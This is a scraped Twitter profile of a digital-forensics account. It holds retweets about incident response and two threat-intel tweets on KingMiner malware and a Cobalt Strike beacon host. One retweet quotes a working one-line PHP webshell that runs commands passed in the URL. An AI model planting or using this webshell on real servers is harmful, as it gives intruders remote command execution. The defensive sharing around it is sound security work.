
dfir_it
@dfir_it
Followers
805
Following
2K
Media
15
Statuses
146
We stalk #DFIR on a daily basis and blog once a year.
Joined March 2015
RT @siedlmar: RooCon Call for Papers is open!.We are now accepting papers for RooCon 2023, Cyber Threat Intelligence and Attribution confer….
rsvp.withgoogle.com
Cyber Threat Intelligence and Attribution Conference
0
14
0
RT @JWilsonSecurity: Sometimes you just want to hunt 🔫.Three excellent technologies to investigate are. - VPN Clients. - Proxy Services….
cloud.google.com
0
72
0
RT @Int2e_: Don't know what an Azure Run Command is? Neither did I when we first stumbled on an attacker abusing this during a recent IR ca….
cloud.google.com
We highlight Azure Run Commands and provide guidance for mitigations
0
73
0
RT @nickharbour: #flareon7 The hall of fame is now live! Congratulations everyone. Prizes will begin shipping in Mi….
0
21
0
RT @KarlScheuerman: Just recently realized that SANS Institute posted the presentation deck from the talk @dfir_it and I gave at the SANS….
0
4
0
RT @JaneScott: <❔Oneliner PHP Webshells!❔>. Shortest:.<?=`$_GET[1]`?>.*For even shorter, try dropping ?>. Pass cmd in url query string:.sit….
0
85
0
RT @KarlScheuerman: Didn't realize it was already posted but here is my and @dfir_it / Piotr's @MITREattack ATT&CKcon 2.0 talk from last mo….
0
3
0
RT @saleh_muhaysin: #DFIR Pleased to announce that we have published Kuiper a digital investigation platform. It is designed to aid investi….
github.com
Digital Forensics Investigation Platform. Contribute to DFIRKuiper/Kuiper development by creating an account on GitHub.
0
37
0
It looks like distribution of the #kingminer #malware was moved to GitHub: 24132.txt - 24164.txt - n.txt-
0
1
4
* Tries to download fresh AV signatures from esetcdnserver[.]icu *. * Gets #cobaltstrike beacon *
0
0
3